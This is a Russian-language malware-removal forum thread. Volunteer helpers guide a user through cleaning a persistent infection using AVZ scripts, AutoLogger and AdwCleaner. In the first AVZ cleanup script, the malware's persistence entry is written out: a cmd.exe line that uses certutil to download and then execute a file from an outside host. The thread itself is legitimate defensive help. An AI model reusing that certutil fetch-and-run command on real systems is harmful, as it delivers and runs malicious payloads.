Перейти к содержанию

Рекомендуемые сообщения

После скачивания программы с сомнительного ресурса (моя вина), обнаружилась гора вредоносного ПО на ноутбуке, баннеры, расширения браузера и тд., всё это я успешно почистила вручную и завершила дело сканированием с помощью Dr.Web Cureit, который нашел еще:
C:\Windows\windefender.exe 
C:\Windows\System32\drivers\WinmonFS.sys 
C:\Windows\System32\drivers\Winmon.sys 
\MSTask\csrss 

Однако, после перезагрузки файлы не удалились и в диспетчере задач я снова вижу все эти процессы, а по указанному пути их нет. они грузят систему, самой удалить не получается. помогите от них избавиться 🤷‍♀️

CollectionLog-2020.10.22-23.17.zip

Ссылка на сообщение
Поделиться на другие сайты

Трассировку маршрутов сами прописывали?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafeZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
 DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;
 ImagePathStr, RootStr, SubRootStr, LangID: string;
 AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
 FinishMsg, RestoreMsg, FixMsg, CheckMsg: String;
 RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;

procedure CheckAndRestoreSection(Root: String);
begin
 Inc(AllRoots);
 if RegKeyExistsEx('HKLM', Root) then
   RegKeyResetSecurity('HKLM', Root)
 else
  begin
    Inc(RootsRestored);
    RegKeyCreate('HKLM', Root);
    AddToLog(RegSectMsg + Root + RestMsg);
   end;
end;

procedure CheckAndRestoreSubSection;
begin
  CheckAndRestoreSection(SubRootStr);
end;

procedure RestoredMsg(Root, Param: String);
begin
  AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
  Inc(KeysRestored);
end;

procedure FixedMsg(Root, Param: String);
begin
  AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
  Inc(KeysFixed);
end;

procedure RestoreStrParam(Root, Param, Value: String);
begin
  RegKeyStrParamWrite('HKLM', Root, Param, Value);
  RestoredMsg(Root, Param);
end;

procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
  Inc(AllKeys);
  if not RegKeyParamExists('HKLM', Root, Param) then
    RestoreStrParam(Root, Param, Value);
end;

procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', Root, Param) then
  begin
    RegKeyIntParamWrite('HKLM', Root, Param, Value);
    RestoredMsg(Root, Param);
  end;
end;

procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, Param) then
  begin
    ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
    RestoredMsg(RootStr, Param);
  end;
end;

// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
 RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
 if RegKeyExistsEx('HKLM', RegStr) then
  begin
    Inc(AllKeys);
    RegKeyResetSecurity('HKLM', RegStr);
    RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
    FixedMsg(RegStr, 'ImagePath');
  end;
end;

{ Выполнение исправление всех ключей в ветках -
   'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
     i : integer;
begin
 if Srv = 'BITS' then
   FileServiceDll := FullPathSystem32 + 'qmgr.dll'
 else
   FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
 RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;

 CheckAndRestoreSection(RootStr);

 CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
 CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
 CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
   RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
 else
  begin
    Dec(AllKeys);
    if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
      for i:= 0 to 999 do
       begin
         if i > 0 then
           CCSNumber := FormatFloat('ControlSet000', i)
         else
           CCSNumber := 'CurrentControlSet';
         ImagePathFix(CCSNumber, Srv);
      end;
   end;

 CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
 CheckAndRestoreIntParam(RootStr, 'Start', 2);
 CheckAndRestoreIntParam(RootStr, 'Type', 32);

 if Srv = 'BITS' then
  begin
    CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
    CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
  end;

 SubRootStr:= RootStr + '\Enum';
 CheckAndRestoreSubSection;

 CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
 CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
 CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);

 SubRootStr := RootStr + '\Security';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
  begin
    RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
    RestoredMsg(SubRootStr, 'Security');
  end;

 SubRootStr:= RootStr + '\Parameters';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    RestoredMsg(SubRootStr, 'ServiceDll');
  end
 else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    FixedMsg(SubRootStr, 'ServiceDll');
  end
end;

{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', '');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 QuarantineFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '');
 QuarantineFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '');
 QuarantineFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
 DeleteFile('c:\windows\rss\csrss.exe', '');
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', '');
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 DeleteFile('C:\Windows\rss\csrss.exe', '32');
 DeleteFile('C:\Windows\rss\csrss.exe', '64');
 DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '32');
 DeleteFile('cmd.exe  /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe /31340', '64');
 DeleteFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '64');
 DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '64');
 DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\scheduled.exe', '');
 DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
 ClearLog;
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
 LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage');
 if LangID = '0419' then
  begin
    DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
    DispayNameTextWuauServ := 'Автоматическое обновление';
    DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
    DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
    AddToLog('Операционная система - русская');
    FinishMsg := '–––– Восстановление завершено ––––';
    RestoreMsg := 'Восстановлено разделов\параметров: ';
    FixMsg := 'Исправлено параметров: ';
    CheckMsg := 'Проверено разделов\параметров: ';
    RegSectMsg := 'Раздел реестра HKLM\';
    ParamMsg := 'Параметр ';
    ParamValueMsg := 'Значение параметра ';
    InRegSectMsg := ' в разделе реестра HKLM\';
    CorrectMsg := ' исправлено на оригинальное.';
    RestMsg := 'восстановлен.';
  end
 else
  begin
    DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
    DispayNameTextWuauServ := 'Automatic Updates';
    DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
    DispayNameTextBITS := 'Background Intelligent Transfer Service';
    AddToLog('Operation system - english');
    FinishMsg := '–––– Restoration finished ––––';
    RestoreMsg := 'Sections\parameters restored: ';
    FixMsg := 'Parameters corrected: ';
    CheckMsg := 'Sections\parameters checked: ';
    RegSectMsg := 'Registry section HKLM\';
    ParamMsg := 'Parameter ';
    ParamValueMsg := 'Value of parameter ';
    InRegSectMsg := ' in registry section HKLM\';
    CorrectMsg := ' corrected on original.';
    RestMsg := ' restored.';
  end;
 AddToLog('');

{ Определение папки X:\Windows\System32\ }
 NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
 ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
 Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
 FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';

 AllRoots := 0;
 AllKeys := 0;
 RootsRestored := 0;
 KeysRestored := 0;
 KeysFixed := 0;

 CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
 CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');

 AddToLog('');
 AddToLog(FinishMsg);
 AddToLog('');
 AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
 AddToLog(FixMsg + IntToStr(KeysFixed));
 AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
 SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
 TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe');
 TerminateProcessByName('c:\users\mistress\appdata\roaming\b9cdde3b480f\b9cdde3b480f.exe');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('C:\Windows\windefender.exe', '');
 QuarantineFileF('c:\users\mistress\appdata\local\temp\csrss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFileF('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '32');
 DeleteFile('c:\windows\rss\csrss.exe', '32');
 DeleteFile('C:\Windows\windefender.exe', '32');
 DeleteFileMask('c:\users\mistress\appdata\local\temp\csrss', '*', true);
 DeleteFileMask('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*', true);
 DeleteDirectory('c:\users\mistress\appdata\local\temp\csrss');
 DeleteDirectory('c:\users\mistress\appdata\roaming\b9cdde3b480f');
 DeleteSchedulerTask('csrss');
 DeleteSchedulerTask('ScheduledUpdate');
 DeleteSchedulerTask('ScheduledUpdate');   DeleteSchedulerTask('YjuvlbImHgDMaWtHI.job');
 DeleteSchedulerTask('YjuvlbImHgDMaWtHI');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet', 'x64');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(3);
 ExecuteRepair(4);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[

 

 

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты
17 часов назад, regist сказал:

Трассировку маршрутов сами прописывали?

Доброй ночи, нет, я ничего не прописывала

17 часов назад, regist сказал:

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

скрипт не хочет работать или я что-то не так делаю

Ошибка скрипта: ')' expected, позиция [278:2]
Ошибка скрипта: Undeclared identifier: 'DeleteSchedulerTask', позиция [253:21]

 

прошу прощения, все сработало (изначально запускала АВЗ не из автологгера)
после перезагрузки всё чисто, насколько я могу сейчас судить, спасибо большое 🥰
прикрепляю логи повторной диагностики

  

CollectionLog-2020.10.23-00.36.zip

Ссылка на сообщение
Поделиться на другие сайты

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

Ссылка на сообщение
Поделиться на другие сайты
8 часов назад, Sandor сказал:

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

Здравствуйте, после скрипта этот файл не появился, только quarantine.zip, который я отправила на указанный адрес 

Ссылка на сообщение
Поделиться на другие сайты
23 часа назад, auntmary сказал:

скрипт не хочет работать или я что-то не так делаю

Ошибка скрипта: ')' expected, позиция [278:2]

Поправил, попробуйте ещё раз.

Ссылка на сообщение
Поделиться на другие сайты
23.10.2020 в 23:40, regist сказал:

Поправил, попробуйте ещё раз.

 

снова здравствуйте, только сейчас заметила последствия вируса, а именно невозможно открыть дискорд на компьютере и переустановить его так же не выходит, есть ли решение у этой проблемы?

 

при попытке установить дискорд выдает 

image.png.6c4af4789d2bff6db3a735ff486b3db3.png

 

23.10.2020 в 08:23, Sandor сказал:

После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению.
 

только сейчас заметила, что файл появился на рабочем столе второй учетной записи!

Correct_wuauserv&BITS.log

Ссылка на сообщение
Поделиться на другие сайты

Ещё раз, пожалуйста, соберите свежий CollectionLog.

Дополнительно:

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты
22.10.2020 в 21:02, regist сказал:

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

То есть заново отправьте карантин.  И жду лога Автологера.

 

5 часов назад, auntmary сказал:

файл появился на рабочем столе второй учетной записи!

Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных.

Ссылка на сообщение
Поделиться на другие сайты
26.10.2020 в 09:06, Sandor сказал:

Ещё раз, пожалуйста, соберите свежий CollectionLog.

Дополнительно:

 

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.

 

Подробнее читайте в этом руководстве.
 

 

все сделала, вот логи. эх снова те же вирусы 🙂 
 

AdwCleaner[C00].txt AdwCleaner[S00].txt

 

26.10.2020 в 10:45, regist сказал:

То есть заново отправьте карантин.  И жду лога Автологера.

 

Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных.


я все делала в своей учетной записи, просто я её когда то не совсем правильно переименовала (у меня руки не совсем из того места выросли) и логи оказались в пустой папке с прошлым именем пользователя. мне все равно стоит всё проделать заново?

Ссылка на сообщение
Поделиться на другие сайты
15 часов назад, auntmary сказал:

AdwCleaner[C00].txt

разве кто-то просил вас удалять найденное?

 

15 часов назад, auntmary сказал:

мне все равно стоит всё проделать заново?

Надо делать только то, что просят

26.10.2020 в 07:45, regist сказал:

заново отправьте карантин.  И жду лога Автологера.

 

Ссылка на сообщение
Поделиться на другие сайты

1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

2) Скачайте этот архив. Запустите рег-файлы из архива и согласитесь на внесение изменений в реестр.

3) Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '');
 DeleteFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '64');
 DeleteSchedulerTask('{7F9FD259-8224-4672-BBA9-DBA84C2F0B3A}');
 DeleteSchedulerTask('lAdMHZBqUcXIeKJ');
 DeleteSchedulerTask('Lenovo\Lenovo Service Bridge\S-1-5-21-3833064128-939169056-4125991240-1001');
 DeleteSchedulerTask('TVT\TVSUUpdateTask_UserLogOn');
 DelCLSID('OpenVPN_UserSetup');
ExecuteSysClean;
 ExecuteRepair(20);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

4)

- Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

 

5) Запустите снова AutoLogger, соберите и прикрепите свежие логи.

Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • От Амир
      Добрый вечер! Поймал вирус, в этот момент был установлен KTS, он сразу начал лечить, обнаружил кучу троянов и майнер, ну я и думал, что проблема прошла. Однако у меня не скачивались файлы в браузере и вообще компьютер странно себя вёл. Решил переустановить антивирус, и тут столкнулся с описанной в заголовке проблемой. Огромное спасибо всему вашему коммьюнити)
       
      К тому же видимо у меня украли пароли, хранящиеся в системе, т.к. кто-то пытался войти в мой вк, однако двухфакторка не дала. Через консоль обнаружил стороннюю учётную запись 'john', прямо как год назад) Однако теперь командой /delete она не удаляется, мол, не достаточно прав
      CollectionLog-2020.11.30-22.46.zip
    • От galik
      Не с того не с чего KIS вдруг выдал что у меня в системной памяти троян ,после лечения с перезагрузкой.Проверил с помощью AutoLogger-test.


      CollectionLog-2020.11.28-18.14.zip
    • От Александр Алексеев
      Добрый день. Дети долгое время пользовались ноутбуком и нахватали вирусов.  Вставил в ноут свою флэшку и все файлы превратились в ярлыки. Помогите пожалуйста удалить вирусы с ноутбука и востановить файлы.
      CollectionLog-2020.11.26-18.11.zip
    • От Den1xxx
      Как в этой теме:
      Поймали такого же шифровальщика.
      Благо были бекапы, пропало немного, но хотелось бы разобраться, поддается ли расшифровке.
      Некоторые признаки позволяют на это надеяться.
      Внутри файлов есть «техническая секция», ключ открытый видимо зашит в названиях.
      Имеются дубликаты файлов нешифрованных.
      Имеются части программ жулика.
      Логи, собранные Farbar Recovery Scan Tool, собрать не получается.
      Связывался ради интереса с жуликом, выслал 2 файла.
      То, что он может расшифровать, он доказал, прислал скрины:

      То, что он получил 2 файла и расшифровал, также доказывает наличие открытого ключа в файле или скорее всего в его имени.
      Возможно, их два, каждый файл оканчивается 4F931AF4-67D384F2
       
      shifr.zip следы_взлома.zip
    • От Hoarrr
      Доброго времени суток!
      Последний Kaspersky Total Security постоянно находит в памяти MEM:Trojan.Win32.SEPEH.gen. Выбор опции лечение с перезагрузкой не помогает. KTS что-то делает, потом перезагружает компьютер, рапортует о том, что все вылечено, но через какое-то время выдает сообщение об обнаружении MEM:Trojan.Win32.SEPEH.gen в системной памяти. При повторном запуске полного сканирования с максимальными настройками безопасности в системной памяти то находит MEM:Trojan.Win32.SEPEH.gen, то не находит, будто бы через раз это делает.
×
×
  • Создать...